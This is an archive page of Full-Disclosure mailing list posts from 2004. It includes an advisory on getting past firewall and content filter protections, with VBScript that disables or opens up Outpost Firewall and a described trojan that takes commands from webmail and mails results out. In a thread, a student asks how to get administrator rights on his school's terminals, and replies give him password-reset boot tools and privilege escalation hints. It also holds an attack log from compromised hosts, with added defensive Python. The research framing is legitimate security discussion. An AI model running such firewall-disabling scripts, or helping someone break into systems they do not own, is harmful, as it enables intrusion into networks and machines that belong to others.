Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgIxzDecnbV4Fd/IRAp1uAJ9RTKvSZ9454aCirBn+nEgl/2cLvwCg3gio
anTH7OMpQmxY75dz9+CW0Fo=
=CyGg
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: Death Notice: Matt Heckaman

From: Gary Kline (kline@tao.thought.org)
Date: Thu Oct 28 2004 - 00:00:57 CDT


On Wed, Oct 27, 2004 at 11:11:20PM -0500, J.A. Terranson wrote:
>
> [Posted to a variety of places, as Matt was a prolific coder who
> maintained many ports and worked on literally dozens of projects]
>
> --
> Yours,
>
> J.A. Terranson
> sysadminmfn.org
> 0xBD4A95BF
>
> "An ill wind is stalking
> while evil stars whir
> and all the gold apples
> go bad to the core"
>
> S. Plath, Temper of Time
>
> ------------------------------------------------------------------------------
>
>
> http://obit.pumphreyfuneralhome.com/obit_display.cgi?id=161939&listing=Current
>
> Matthew Heckaman Ferraro
> Born in Mishawaka, IN on Jan. 4, 1982
> Departed on Oct. 20, 2004 and resided in Gaithersburg, MD.
>
> Memorial Service: Oct. 30, 2004
> Cemetery: Arlington National Cemetery Columbarium
> Please click on the links above for locations, times, maps, and
> directions.
>
>
> Matthew Heckaman Ferraro (age 22)
> Matthew of Gaithersburg, MD, formerly of Montreal Canada,
> passed away on Wednesday, October 20, 2004. He was the beloved
> husband of Stacie Jo Ferraro; loving son of Claire Ferraro
> (husband, Eddy) and Marshall Heckaman (wife, Sharon) of Indiana;
> loving brother of Andria, David and Allan; stepbrother of Cynthia
> Ferraro (Daniel Aston) son-in-law of Mike and Marjorie Bland of
> Maryland and their daughters, Resha and Stephanie; grandson of
> Adrien and Cecile Blanchette of Montreal, Canada and John and
> Ruth Heckaman of Indiana; grandson-in-law of Anastacia Quitania.
> He was predeceased by a stepbrother Jonathan Ferraro. Also survived
> by his aunts and uncles, Helene Blanchette (Denis Pare) and Pierre
> Blanchette of Montreal, Canada, Nicole Blanchette (Brian Smith) of
> London, Ont., Dorothy (Doc) Anderson of Illinois and by all his
> extended family and friends in Montreal, Indiana, Maryland and
> elsewhere. Matthew was an active duty PV2 of the United States
> Army. A memorial service will be held at PUMPHREY'S COLONIAL FUNERAL
> HOME, 300 West Montgomery Avenue (Rte 28 just off I-270, exit 6-A)
> Rockville, MD on Saturday, October 30, 2004 at 1 PM. Inurnment service
> with Military Honors will be held at Arlington National Cemetery
> Columbarium on Thursday, November 4, 2004 at 10 AM.
>

        thanks for this post; it honors matt. we're all the poorer
        for his death. we are all the richer for his having lived.
        ... .

        -g

--
   Gary Kline klinethought.org www.thought.org Public service Unix

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Presentation: Bypassing client application protection techniques with notepad

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Thu Oct 28 2004 - 07:56:48 CDT


Topic: Bypassing client application protection techniques
Category: Protection bypass
Affected products:
 CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence
 (R55) HFA 9
 Microsoft Windows XP SP2
 Agnitum Outpost Pro 2.1, 2.5
 Tiny Firewall Pro v6.0.100
 ZoneAlarm Pro with Web Filtering v4.5.594
 BlackICE PC Protection 3.6
 Kerio Personal Firewall 4.0
 WRQ ATGuard 3.2
Authors:
 offtopic, <offtopicmail.ru>
 3APA3A, <3APA3Asecurity.nnov.ru>
Original link:
 http://www.security.nnov.ru/advisories/bypassing.asp
Special thanks to Igor U. Miturin for testing and coordinating
Checkpoint issues, to Checkpoint for cooperation, to Agnitum for
"opossum" topic public debates and some ideas.

Disclaimer:

</SARCASM>
This article is neither an attempt to teach script kiddies to write trojans
nor an attempt by the authors to create one. It's a call to the security
community to activate discussion on protection techniques for Internet client
application security. Yes, we want to fire a flame. We apologize that we did
not contact vendors on many issues they may consider security
vulnerabilities in their products. We believe that, to solve the discussed
problem instead of fixing the illustrating PoCs, all products must be
architecturally changed, not patched. Before such an architectural change, any
schoolboy with scripting skills can get access to a corporate network
protected by an advertised product. We share the point of view that this should
not be treated as a product vulnerability.
<SARCASM>
<APPLAUSE />
(yes, pedram).

1. Introduction

 1.1 Front end security

 The last few years were revolutionary for network services infrastructure
 security. In addition to more secure and stable operating systems and
 services, we've got a lot of industrial solutions - stateful firewalls
 with level 7 inspection, intrusion detection and intrusion prevention
 systems, reliable clusters and distributed solutions to fight DDoS
 attacks... And we got actually nothing in the field of client
 application protection. Security of client network applications, such
 as browsers, mail and instant messaging agents, is on the same level it
 was 5 years ago, and things have become worse, because these applications
 are now critical for business; we can not simply stop using e-mail.
 <APPLAUSE />

 Client application security is very important, because the same application
 can be used to process untrusted, potentially dangerous data as well
 as sensitive information.
 <OBJECTIONS FROM HALL, LEFT UNANSWERED />

 We, like many security professionals, have a feeling that the industry is
 moving in the wrong direction in the area of client application security.
 This article was written to demonstrate this point of view. We discuss
 some methods of breaking into a managed, protected corporate network
 without any special skills. The "exploits" illustrating this article were
 written with notepad.exe.

 1.2 What do you use to protect your client systems against Internet
 attack?

 There are very few widely deployed techniques. Among them are: content
 filtering on the corporate firewall (including antivirus filtering),
 personal antiviruses and personal firewalls (PFW). In addition to
 content filtering, personal firewalls implement integrity control for
 applications and the system by controlling the integrity of files, blocking
 access to some API functions and limiting network access to trusted
 applications only.

 Of course, there are a few really interesting approaches to securing client
 applications, some of them are discussed later, but usually these
 techniques are not widely used.

 1.3 What we will demonstrate

 We will not teach you how to attack any specific client application.
 The latest Mozilla experience demonstrates that a security bug in a client
 application can always be found for approximately $500 (should we talk
 about Internet Explorer? Mozilla goes at a discounted price because it is
 not in demand on the zombie market). We will try to illustrate that $500 is
 probably all that is required to get access to your network. It doesn't
 depend on the protection techniques listed above, because the protection
 can be bypassed by any schoolboy. If this protection is all you have, you
 have no protection at all. In fact, iDefense does more for the community
 than any PFW vendor (it's not a joke): it pays more for a newly discovered
 security issue than the shadow market does. At least you have an additional
 $500 of security this way.
 <LAUGHING, OBJECTIONS (LEFT UNANSWERED), APPLAUSE />
 </SARCASM>
 The problem of paid vulnerability research is not black-and-white as one
 might believe. Without commercial software or commercial services,
 freeware would not survive, because a good programmer needs money. The same
 tendencies exist in vulnerability research. C'est la vie. We can discuss
 it.
 <SARCASM>
 Full-disclosure? Who believes in it...

 So, we proudly present to you how to:

 Bypass content filtering for corporate and personal firewalls (yes,
 again, and again and again).
 Bypass network access protection for personal firewalls.
 Bypass integrity protection for personal firewalls or antiviruses.

 The list of tested products is above. It's incomplete. Some vendors were
 contacted and replied. Some fixes were published, but none of the contacted
 vendors was able to fix all the problems discussed. We do not believe it's
 possible in the near future to prevent a corporate network protected only
 with firewalls, personal firewalls and antiviruses from being hacked by
 a schoolboy.

<DEEP SILENCE />
<PUTTING MEAN BLACK HATS ON />
2. Bypassing content filtering again and again and again
 ____________________________________________________________
 Axiom: there is always one more way to bypass a content filter.

 Explanation: because the content filter and the client application use
 different algorithms for data processing, there is always data that is
 processed differently by the client application and the content filter.

 2.1 Configuration used

 In our configuration we used the content filtering features of 2 firewalls:
 Checkpoint as the corporate firewall and Agnitum Outpost Pro as a personal
 firewall. Both firewalls were set to filter scripting and ActiveX
 elements. Using a few techniques described in [1], we wrote a set of
 tests to attack Internet Explorer protected by these 2 firewalls (and
 additionally by 2 different antiviruses) on 2 different levels, to
 execute JavaScript.

 2.2 Test descriptions:

  2.2.1 http://www.security.nnov.ru/files/opossum/test1.html
  Problem with special characters (0x0B) demonstrated. [1].II.9
 
  2.2.2 http://www.security.nnov.ru/files/opossum/test2.html
  Problem with RFC2781 decoding (UTF-16, little endian). [1].II.1

  2.2.3 http://www.security.nnov.ru/files/opossum/test3.html
  Problem with RFC2781 decoding (UTF-16, big endian). [1].II.1

  2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif
  Different approaches of different clients to content type definition [1].II.13
  
  2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif
  Same as 2.2.4 + exploitation of stream buffering.

  2.2.6 http://www.security.nnov.ru/files/opossum/test6.html
  Problem with special characters (0x00) demonstrated. [1].II.9

  2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp
  Inability to parse UTF-7 encoding (with Content-Type) [1].II.2

  2.2.8 http://www.security.nnov.ru/files/opossum/test8.html
  Inability to parse UTF-7 encoding (with Meta http-equiv) [1].II.2

  2.2.9 http://www.security.nnov.ru/files/opossum/test9.html
  Inability to catch scripting via expression(). Was described by
  http-equiv (malware.com).

  2.2.10 http://www.security.nnov.ru/files/opossum/test10.html
  Inability to catch scripting in styles [1].II.15
  
  2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht
  Inability to parse MHT files (RFC 2557)

  The content filtering bypass techniques used have been known for years.
  Outpost failed all tests. Checkpoint failed 2.2.2, 2.2.3, 2.2.6, 2.2.8,
  2.2.9, 2.2.10, 2.2.11.

 2.3 Vendors:

  Both Checkpoint and Agnitum were contacted. Checkpoint covers the issues
  discussed in R55HFA10. 2.2.10 and 2.2.11 additionally require
  disabling CSS and MHT with special settings (I do not believe this can
  be accepted as a solution). Agnitum fixes very few issues in the Outpost
  2.5 version. Please check your own content filter before blaming Agnitum
  or Checkpoint.

3. Bypassing network access restrictions with trusted application
 ____________________________________________________________
 Axiom: Malware is indistinguishable from a user application

  The next step after a successful client application attack is usually
  getting remote control of the attacked computer.

  A personal firewall usually restricts network access to a list of
  allowed applications. In addition, the integrity of these applications is
  controlled to prevent code insertion into the executable file. This makes
  it impossible to install a trojan application with direct network access.

  The common idea behind bypassing this protection is using a trusted
  application (for example, a browser) to access the external network.
  Usually, the execution flow of the target application is altered with the
  DLL injection technique, WriteProcessMemory(), CreateRemoteThread() or
  something like this. You can find a description in [1] and [2]. These
  methods require programming skills; additionally, a personal firewall
  could set hooks to protect against this kind of attack. Additionally, the
  trojan application in this case should implement almost all network
  functions, including network topology discovery and proxy communication.

  Additionally, the client application's access can be limited to a list of
  trusted sites only.

  Our approach is very simple. We call it CAT (Client Application
  Trojaning). We use the trusted application itself without attempting to
  hack into its code.
   http://www.security.nnov.ru/files/opossum/CAT.zip
  is a simple PoC application. CAT uses COM to launch and control the client
  application (Internet Explorer). This allows practically full access
  to the IE resources, so we can ask IE to navigate to our site, and IE
  will use its proxy and other settings. We don't need to include
  HTTP client code in our application - IE does all the work for us.

  Another interesting thing is that it works via trusted sites. In our
  example the trojan uses the www.mail.ru server to communicate with the bad
  guy, but it is easy to use other trusted network services, for example
  Google's proxy
  (http://translate.google.com/translate?hl=en&u=www.phrack.org).
  Additionally, almost any search engine can be used as a proxy, with the
  only limitation that each iteration may require a few days.
  
  This CAT PoC works as follows:

  - It creates an IE COM object and navigates to the www.mail.ru site.
  - CAT passes the username and password to the site and gets access to the mailbox.
  - CAT sends the notification message "ready" to the specified mailbox.
  - Every 20 seconds CAT checks the mailbox for messages with the XXX.request
    subject (XXX - an integer number).
  - If a message appears in the mailbox, CAT reads it, deletes the message, and
    processes its data as a batch file.
  - Execution results are sent to a predefined account.

  Remove the IE.Visible = true
  line to run the application in hidden mode.

  All this great functionality fits in 100 lines of VBS. You see, Basic
  can be more effective than assembler.
  <AREN'T WE SCRIPT KIDDIES IN IMAGINARY BLACK HATS?>
  ILOVEYOU and other scripting viruses demonstrated that an application like
  this can be written by 14-year-old schoolboys. VBS can be executed from
  Microsoft Office applications, Windows Explorer, Internet Explorer,
  etc.

  All personal firewalls tested, except Outpost 2.5, failed to detect the
  information leak with this script. Outpost 2.5 requires a minor
  modification of the original script to start one additional IE instance
  before launching IE via COM; the script modification is left as homework.

4. Bypassing personal firewall integrity protection
 ____________________________________________________________
 Axiom: Malware is indistinguishable from the user

  This script unloads the Outpost firewall (any version):

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"

  Another one creates a rule to permit Internet access for all
  applications:

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       WShell.SendKeys "n"

<APPLAUSE, BRAVOS />
<MEAN HATS OFF />

5. Final noise.
 ____________________________________________________________
 Axiom: There is no cure against unknown malware. There are no axioms in
 client application protection.

 The only way to somehow secure a client application is implementing a
 sandbox for any application that works with untrusted data. There are
 attempts to implement such a sandbox without limiting its functionality,
 for example GeSWall [4] (by the way, this project is looking for a sponsor
 or investor). There are a few commercial solutions of this kind; I do not
 believe any of these solutions provides reliable security for Internet
 client applications. Virtual machines for most architectures also have
 known flaws. The most reliable way to protect client applications for now is
 creating an additional DMZ for application servers and providing
 terminal access to untrusted applications inside the DMZ. A configuration
 example can be found in [5]. Of course, this approach is not 100%
 reliable either.

 That's all.

<LONG APPLAUSE, OBJECTIONS FROM HALL (LEFT UNANSWERED), A COUPLE OF
WELL ANSWERED ROTTEN EGGS />

6. Links:

[1] 3APA3A, Bypassing content filtering software
http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester
http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls
http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall)
http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security"
http://www.linuxchile.cl/docs.php?op=ver&id=65

<WARNING: SARCASM tag was not open within document \>
<WARNING: SARCASM tag was not closed within document \>

--
/3APA3A
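As an added illustration of the axiom in section 2 (this is not code from the advisory or from security.nnov.ru), the following Python compares a naive byte-pattern filter with one that first normalizes the stream the way the advisory says the browser does: honouring a UTF-16 BOM (tests 2.2.2 and 2.2.3), a charset declared in a meta http-equiv such as UTF-7 (tests 2.2.7 and 2.2.8), and dropping the 0x00 and 0x0B characters that IE ignores inside markup (tests 2.2.1 and 2.2.6). The sample documents are constructed, and the exact positions at which the control bytes are inserted are an assumption made for illustration.

```python
"""Why a byte-pattern content filter and the browser disagree.

Added example; not code from the advisory. The sample documents are
constructed, and the placement of the ignored control bytes is an
assumption for illustration.
"""
import codecs
import re

# Constructed samples covering the encodings named in section 2.2.
SAMPLES = {
    "utf16le_bom": codecs.BOM_UTF16_LE + "<script>alert(1)</script>".encode("utf-16-le"),
    "utf16be_bom": codecs.BOM_UTF16_BE + "<script>alert(1)</script>".encode("utf-16-be"),
    # UTF-7 spelled out by hand: '+ADw-' decodes to '<', '+AD4-' to '>'
    "utf7_meta": (b'<meta http-equiv="Content-Type" content="text/html; charset=utf-7">'
                  b'+ADw-script+AD4-alert(1)+ADw-/script+AD4-'),
    "nul_in_tag": b"<scr\x00ipt>alert(1)</script>",
    "vt_in_tag": b"<scr\x0bipt>alert(1)</script>",
    "plain": b"<script>alert(1)</script>",
    "benign": b"<p>hello</p>",
}

CHARSET_RE = re.compile(rb'charset=["\']?([A-Za-z0-9_-]+)', re.I)
IGNORED_CONTROLS = {0x00: None, 0x0B: None}   # str.translate deletes these


def naive_has_script(data: bytes) -> bool:
    """What a filter that pattern-matches the raw byte stream sees."""
    return b"<script" in data.lower()


def normalize(data: bytes) -> str:
    """Decode the document the way a browser would before inspecting markup."""
    if data.startswith(codecs.BOM_UTF16_LE):
        text = data[2:].decode("utf-16-le", "replace")
    elif data.startswith(codecs.BOM_UTF16_BE):
        text = data[2:].decode("utf-16-be", "replace")
    else:
        m = CHARSET_RE.search(data)
        charset = m.group(1).decode("ascii") if m else "latin-1"
        try:
            text = data.decode(charset, "replace")
        except LookupError:          # unknown charset name: fall back
            text = data.decode("latin-1", "replace")
    # drop the control characters the parser skips, then compare case-insensitively
    return text.translate(IGNORED_CONTROLS).lower()


def normalized_has_script(data: bytes) -> bool:
    """The same check, run on the normalized text instead of the raw bytes."""
    return "<script" in normalize(data)


def compare(samples=SAMPLES) -> dict:
    """Map sample name -> (naive verdict, normalized verdict)."""
    return {n: (naive_has_script(d), normalized_has_script(d)) for n, d in samples.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:12s} naive={naive!s:5s} normalized={norm}")
```

The naive filter misses every encoded sample and catches only the plain one; the normalizing filter catches all of them. The point is not the list of five tricks but that the filter must decode with the client's rules, which is why the advisory calls the gap architectural.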

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Valentin Höbel (hoebelgmail.com)
Date: Thu Oct 28 2004 - 08:08:21 CDT


> Hi folks,
>
> I'm at a boarding school in Germany and we have a kind of internet
> terminal there with win2003 running on the computers. My question is:
> Is there a way of getting administrative privileges ? I used an RPC
> Exploit before but now the computers are patched. How do I get an
> administrator account now?? I have physical access to the
> computers.....
>
> Greetings
>
> valentin - germany
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
Date: Thu Oct 28 2004 - 08:41:05 CDT


Op Thursday 28 October 2004 15:08, Valentin Höbel sgreifde:
> > Hi folks,
> >
> > I'm at a boarding school in Germany and we have a kind of internet
> > terminal there with win2003 running on the computers. My question is:
> > Is there a way of getting administrative privileges ? I used an RPC
> > Exploit before but now the computers are patched. How do I get an
> > administrator account now?? I have physical access to the
> > computers.....

use knoppix to boot from, mount the ntfs filesystem, and search the net for
which keys in the registry you have to change. there may be other files too that
you have to change

there even are special boot CDs that are made only for the purpose of changing
the admin pass etc...

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Random Letters (randomisedlettershotmail.com)
Date: Thu Oct 28 2004 - 09:17:09 CDT


Why do you want to get administrative privileges? It can't be for a good
purpose. You just want to make more work for the people who probably work
very hard supporting you. You're a parasite.

Grow up, get a life. If you want to be Administrator then buy your own PC.

This list is for people who try to prevent break-ins - I'll bet that no-one
here will help you.

>I'm at a boarding school in Germany and we have a kind of internet
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used an RPC
>Exploit before but now the computers are patched. How do I get an
>administrator account now?? I have physical access to the
>computers.....
>
>Greetings
>
>valentin - germany


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

From: Elia Florio (eflorioedmaster.it)
Date: Thu Oct 28 2004 - 09:44:08 CDT


Hi list,
I'm fighting again against a hackers' crew
(I suppose the same one mentioned in this link:
http://seclists.org/lists/incidents/2004/Jul/0056.html )
which is installing various malware on many
compromised boxes to get a group of zombies ready to run.
(follow my previous mail on "xpire.info" and "splitinfinity.info")

I've found in some logs that they use different exploits on port 80,
but one exploit is specific to Apache 1.3.27 (with PHP/Perl
and other modules installed).

It looks like an overflow; I know that 1.3.27 is a buggy version,
but I would like to know if anyone has seen this code before.
Extracted from the Apache error log:

216.40.203.9 - - [28/Oct/2004:10:54:37 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd8(xcbtxa6xba"
400 299

140.105.55.159 - - [08/Oct/2004:15:55:35 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_x8ci7x9fx8cxec" 400
-

195.140.140.122 - - [11/Oct/2004:03:58:05 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xc3x8cx8czxcfx19"
400 -

212.78.145.16 - - [13/Oct/2004:20:48:23 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd4Nx91x10x04M" 400
-

65.125.235.250 - - [28/Oct/2004:09:55:02 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe5"
400 - "-" "-"

65.125.235.250 - - [28/Oct/2004:09:55:58 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe8"
400 - "-" "-"

I would suggest to any sysadmin using Apache 1.3.27 to ban these subnets
from their hosts, because all attacks are coming from these machines:

216.40.203.*,
140.105.55.*,
195.140.140.*,
212.78.145.*,
65.125.235.*
(...and obvious "xpire.info")

Someone suggests to me that they are related to :

Qwest Communications NET-QWEST-BLKS-4 (NET-65-112-0-0-1)
65.112.0.0 - 65.127.255.255
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

The exploits left these signatures (I have to translate the opcodes into asm):

xC6 xC2 x2C x37 x60 xC1 xEF xD4 xC4 x92 x22 x64 xC6 x6A xE1 x0D x8A
x6A x5F xD4 x4E x91 x10 x04 4D

The last bytes change in every attempt, so this seems to be a
brute-force attempt to get a valid return address to execute the exploit.

Probably the exploit works for a specific version of Apache/Linux kernel,
so the hacker has to try many times with different return addresses to
find the right way to execute it.

Any comments?

EF
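As an added example (not part of Elia's mail), here is a small triage script in Python for exactly this kind of log evidence. It parses lines in Apache's common log format as Apache actually writes them (non-printable request bytes escaped as \xNN, embedded quotes as \"), flags request lines that start with no HTTP method and carry high bytes, recovers the shared byte prefix that the mail points out stays constant while the tail varies, and counts flagged sources per /24. The log lines are constructed with documentation addresses and only mirror the shape of those quoted above.

```python
"""Triage of Apache log lines carrying binary request data.

Added example; not from the original mail. The log lines below are
constructed (RFC 5737 documentation addresses) to mirror the shape of
the lines quoted in the mail, with Apache's usual \\xNN escaping.
"""
import ipaddress
import re
from collections import Counter

# Constructed sample: three binary probes answered with 400, one normal request.
SAMPLE_LOG = r'''
192.0.2.10 - - [28/Oct/2004:10:54:37 +0200] "\xc6\xc2,7`\xc1\xef\xd4$\xc4\x92\"d\xc6j\xe1r\x8aj_\xd8(\xcbt\xa6\xba" 400 299
198.51.100.7 - - [08/Oct/2004:15:55:35 +0200] "\xc6\xc2,7`\xc1\xef\xd4$\xc4\x92\"d\xc6j\xe1r\x8aj_\x8ci7\x9f\x8c\xec" 400 -
192.0.2.11 - - [28/Oct/2004:09:55:02 +0200] "\xc6\xc2,7`\xc1\xef\xd4$\xc4\x92\"d\xc6j\xe1r\x8aj_A}\xeb\xfa\x8a\xe5" 400 - "-" "-"
203.0.113.5 - - [28/Oct/2004:09:57:00 +0200] "GET /index.html HTTP/1.0" 200 1043
'''

# Common/combined log format up to the size field; the request field may
# contain backslash escapes, so it is matched with an escape-aware group.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:\\.|[^"\\])*)" (?P<status>\d{3}) (?P<size>\S+)'
)

HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"TRACE", b"CONNECT"}


def unescape_request(field: str) -> bytes:
    """Turn Apache's escaped request field (\\xNN, \\") back into raw bytes."""
    return field.encode("latin-1").decode("unicode_escape").encode("latin-1")


def is_binary_probe(raw: bytes, status: str) -> bool:
    """A request line that is not HTTP at all, carries high bytes and was rejected."""
    method = raw.split(b" ", 1)[0]
    has_high_bytes = any(b >= 0x80 for b in raw)
    return method not in HTTP_METHODS and has_high_bytes and status.startswith("4")


def common_prefix(blobs) -> bytes:
    """Longest shared byte prefix: the constant part of a repeated probe."""
    if not blobs:
        return b""
    first, rest = blobs[0], blobs[1:]
    n = 0
    while n < len(first) and all(len(b) > n and b[n] == first[n] for b in rest):
        n += 1
    return first[:n]


def triage(log_text: str) -> dict:
    """Summarise flagged probes: count, constant prefix, varying tail, sources."""
    flagged = []
    sources = Counter()
    total = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        total += 1
        raw = unescape_request(m["req"])
        if is_binary_probe(raw, m["status"]):
            flagged.append(raw)
            net = ipaddress.ip_network(f"{m['ip']}/24", strict=False)
            sources[str(net)] += 1
    prefix = common_prefix(flagged)
    return {
        "total": total,
        "flagged": len(flagged),
        "shared_prefix_hex": prefix.hex(),
        "varying_tail_len": max((len(r) for r in flagged), default=0) - len(prefix),
        "sources": dict(sources),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the constructed sample the three probes share a 20-byte prefix and differ only in a 6-byte tail, which is the pattern the mail reads as a return-address guess; the per-/24 counts are what you would feed into a block rule or an abuse report.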


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Andrew Poodle (andrewpIRW.co.uk)
Date: Thu Oct 28 2004 - 09:39:48 CDT


 
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On
> Behalf Of Random Letters
> Sent: 28 October 2004 15:17
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: getting administrator rights on win2003
machine?
>
> <snip>
>
> This list is for people who try to prevent break-ins - I'll bet that
no-one here will help you.

While I was going to agree with you.. Someone has already provided help
onlist...

Shame really..

I almost laughed at the request.. But was a little surprised to see
help offered almost immediately

a

>I'm at a boarding school in Germany and we have a kind of internet
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used an RPC
>Exploit before but now the computers are patched. How do I get an
>administrator account now?? I have physical access to the
>computers.....
>
>Greetings
>
>valentin - germany


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Michel van der Klei (michelmitch-it.com)
Date: Thu Oct 28 2004 - 09:49:19 CDT


On Thu, Oct 28, 2004 at 03:41:05PM +0200, Harry de Grote wrote:
> Op Thursday 28 October 2004 15:08, Valentin Höbel sgreifde:
> > > Hi folks,
> > >
> > > I'm at a boarding school in Germany and we have a kind of internet
> > > terminal there with win2003 running on the computers. My question is:
> > > Is there a way of getting administrative privileges ? I used an RPC
> > > Exploit before but now the computers are patched. How do I get an
> > > administrator account now?? I have physical access to the
> > > computers.....
>
> there even are special bootcd's that are made only for the purpose of changing
> the admin pass etc...

Download the "Trinity Rescue Kit" and use the winpass utility to reset the password.

Regards,

Michel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Honza Vlach (janusvolny.cz)
Date: Thu Oct 28 2004 - 09:49:44 CDT


> use knoppix to boot from, mount the ntfs filesystem, and search the net for
> which keys in registry you have to change. there may be other files too that
> you have to change
>
> there even are special bootcd's that are made only for the purpose of changing
> the admin pass etc...

I thought that real blackhats don't teach lamers who can't even do their
homework properly =^)
 
Honza

--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GIT/CS d- s: a-- C++++$ ULS++++$ P L+++ E--- W- N+ o? K? w-->--- O? M->+ V? PS PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
------END GEEK CODE BLOCK------
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBgQcISVzvioqX7FkRAs6rAJ9yKP+5vVZdgu7F4ekm95q6cEOqXACffPFm
JuHUpHYRpZt5XFA3j8EQu9E=
=rQWB
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: KF_lists (kf_listssecnetops.com)
Date: Thu Oct 28 2004 - 10:50:32 CDT


Look for wonderful tray icons running as System... (anti-virus software
- *hint*hint*)
-KF

Valentin Höbel wrote:
>>Hi folks,
>>
>>I'm at a boarding school in Germany and we have a kind of internet
>>terminal there with win2003 running on the computers. My question is:
>>Is there a way of getting administrative privileges ? I used an RPC
>>Exploit before but now the computers are patched. How do I get an
>>administrator account now?? I have physical access to the
>>computers.....
>>
>>Greetings
>>
>>valentin - germany
>>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
